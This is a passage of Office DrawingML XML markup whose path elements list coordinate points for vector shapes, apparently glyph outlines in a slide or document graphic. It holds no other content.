                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120129" y="44170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120624" y="44170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125158" y="42430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129413" y="41160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137591" y="39420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141287" y="38976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147370" y="38976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163334" y="46062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164350" y="47942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164846" y="50330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164846" y="55168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164846" y="65417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164846" y="86398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161709" y="88811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158292" y="90881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150914" y="94361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146850" y="95224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137045" y="95224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133070" y="94145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127850" y="89763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126542" y="86525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126542" y="78371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164846" y="65417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164846" y="55168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123088" y="62915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113461" y="77355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113461" y="90055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115811" y="95783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125260" y="104775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131013" y="107035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141490" y="107035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144716" y="106667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150190" y="105270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152628" y="104406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154724" y="103378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156540" y="102565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158381" y="101473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163741" y="97663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164846" y="96913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164846" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177469" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177469" y="96913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177469" y="95224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177469" y="65417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177469" y="48958"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="280035">
                  <a:moveTo>
                    <a:pt x="217195" y="29603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="204533" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204533" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217195" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217195" y="29603"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="280035">
                  <a:moveTo>
                    <a:pt x="218008" y="3835"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="203720" y="3835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203720" y="16979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218008" y="16979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218008" y="3835"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="280035">
                  <a:moveTo>
                    <a:pt x="255663" y="240030"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="242582" y="207632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242582" y="230276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242582" y="249580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240728" y="256514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240665" y="256768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232956" y="266433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227672" y="268846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214109" y="268846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199224" y="230276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201117" y="223024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208711" y="213550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214058" y="211175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227723" y="211175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233032" y="213550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240665" y="223024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242582" y="230276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242582" y="207632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241096" y="206260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235178" y="202920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228447" y="200914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220929" y="200240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213347" y="200914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186715" y="231317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186118" y="240030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186715" y="248754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213347" y="279107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220929" y="279781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228447" y="279107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255066" y="248754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255663" y="240030"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="280035">
                  <a:moveTo>
                    <a:pt x="256247" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="243573" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243573" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256247" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256247" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="280035">
                  <a:moveTo>
                    <a:pt x="324954" y="203187"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="321335" y="202615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310286" y="202615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307632" y="203187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299948" y="206565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295503" y="209435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290461" y="213474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290461" y="202615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277799" y="202615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277799" y="277672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290461" y="277672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290461" y="224205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293852" y="221449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297357" y="219214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304647" y="215760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307936" y="214985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="316865" y="214985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320408" y="215392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322427" y="215760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324142" y="216166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324815" y="216166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324815" y="214985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324815" y="213474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324815" y="203187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324954" y="203187"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="280035">
                  <a:moveTo>
                    <a:pt x="377621" y="202349"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="351447" y="202349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351447" y="180695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338772" y="180695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338772" y="202349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330187" y="202349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330187" y="213004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338772" y="213004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338772" y="262178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340766" y="268820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348780" y="277088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354622" y="279171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364515" y="279171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367030" y="278968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372656" y="278155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="375246" y="277634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377278" y="277088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377621" y="277088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377621" y="268033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377621" y="265595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376936" y="265595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="375945" y="266001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374345" y="266522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369849" y="267716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367677" y="268033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="362064" y="268033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360108" y="267716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="359651" y="267716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351447" y="213004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377621" y="213004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377621" y="202349"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="280035">
                  <a:moveTo>
                    <a:pt x="406527" y="69075"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="365213" y="46850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361111" y="46088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343611" y="34328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343611" y="25488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345770" y="21653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354444" y="15709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360210" y="14224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373875" y="14224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380238" y="15290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392709" y="19558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397725" y="22237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="401535" y="25488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402488" y="25488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402488" y="14224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402488" y="9715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397941" y="7721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392734" y="6070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380936" y="3365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374484" y="2692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367411" y="2692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329717" y="23012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329717" y="38747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364515" y="60579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372402" y="61760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376034" y="62484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="383870" y="64554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="387197" y="66205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391553" y="70434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392633" y="73698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392633" y="83324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390334" y="87452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381114" y="93662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374688" y="95224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360565" y="95224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354317" y="94068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340982" y="89484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="335140" y="86233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330060" y="82016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329107" y="82016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329107" y="98717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="335089" y="101384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340969" y="103378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352526" y="106083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="359029" y="106756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373011" y="106756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378764" y="105943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388366" y="102692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392544" y="100457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="399072" y="95224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="399440" y="94932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="401993" y="91694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403796" y="87858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405625" y="84048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406527" y="80187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406527" y="69075"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="280035">
                  <a:moveTo>
                    <a:pt x="421525" y="258457"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="405422" y="258457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405422" y="277672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421525" y="277672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421525" y="258457"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="280035">
                  <a:moveTo>
                    <a:pt x="421525" y="202349"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="405422" y="202349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405422" y="221564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421525" y="221564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421525" y="202349"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="280035">
                  <a:moveTo>
                    <a:pt x="492874" y="61709"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="492683" y="58940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492353" y="53987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490804" y="47193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="488226" y="41338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485736" y="37960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484606" y="36423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480542" y="32042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480542" y="58940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437349" y="58940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437807" y="53987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437896" y="52933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440182" y="47955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="448246" y="39966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453644" y="37960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="467169" y="37960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472211" y="39789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="478802" y="47053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480491" y="52209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480542" y="58940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480542" y="32042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479094" y="30480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471284" y="27508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="461111" y="27508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426999" y="51130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424484" y="67691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425145" y="76504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455510" y="106083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455764" y="106083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464273" y="106692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469176" y="106692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473849" y="106083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482752" y="103644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487108" y="102158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491401" y="100342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491401" y="95631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491401" y="86525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490728" y="86525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="488505" y="88493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484809" y="90500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="474421" y="94615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469265" y="95631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460286" y="95631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456730" y="95084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="450303" y="92913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="447522" y="91313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445198" y="89154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="442760" y="86956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440931" y="84251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438061" y="77254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437362" y="73202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437362" y="68580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492874" y="68580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492874" y="61709"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="280035">
                  <a:moveTo>
                    <a:pt x="561759" y="30441"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="558139" y="29870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547090" y="29870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544436" y="30441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536752" y="33820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532307" y="36690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="527265" y="40741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="527265" y="29870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514591" y="29870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514591" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="527265" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="527265" y="51460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530656" y="48704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="534162" y="46469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="541451" y="43014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544741" y="42252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="553669" y="42252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557212" y="42659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559231" y="43014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560946" y="43421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561619" y="43421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561619" y="42252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561619" y="40741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561619" y="30441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561759" y="30441"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="280035">
                  <a:moveTo>
                    <a:pt x="575602" y="266141"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="521550" y="266141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526021" y="262369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="541070" y="249402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546036" y="244843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="550849" y="240106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="554215" y="236829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557085" y="233845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559422" y="231140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561797" y="228447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="571334" y="206641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="571271" y="194195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568413" y="187579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567537" y="186829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556717" y="177647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="548652" y="175158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="533361" y="175158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528218" y="175818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="517550" y="178435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513283" y="179857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="510108" y="181432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="510108" y="195592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="510781" y="195592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515315" y="192633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="519976" y="190423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529424" y="187579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="533933" y="186829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544182" y="186829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="548970" y="188302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="555866" y="194195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557580" y="198285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557580" y="209207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530974" y="243370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507593" y="263588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507593" y="277672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="575602" y="277672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="575602" y="266141"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="280035">
                  <a:moveTo>
                    <a:pt x="640461" y="29603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="627164" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604037" y="89560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580707" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566928" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597217" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609968" y="104927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616204" y="89560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="640461" y="29603"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="280035">
                  <a:moveTo>
                    <a:pt x="665238" y="250444"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="665124" y="239331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="664248" y="234975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="660298" y="227164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="659752" y="226555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="657491" y="223977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="650494" y="219163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646747" y="217525"/>
                  </a:lnTo>
                  <a:lnTo>
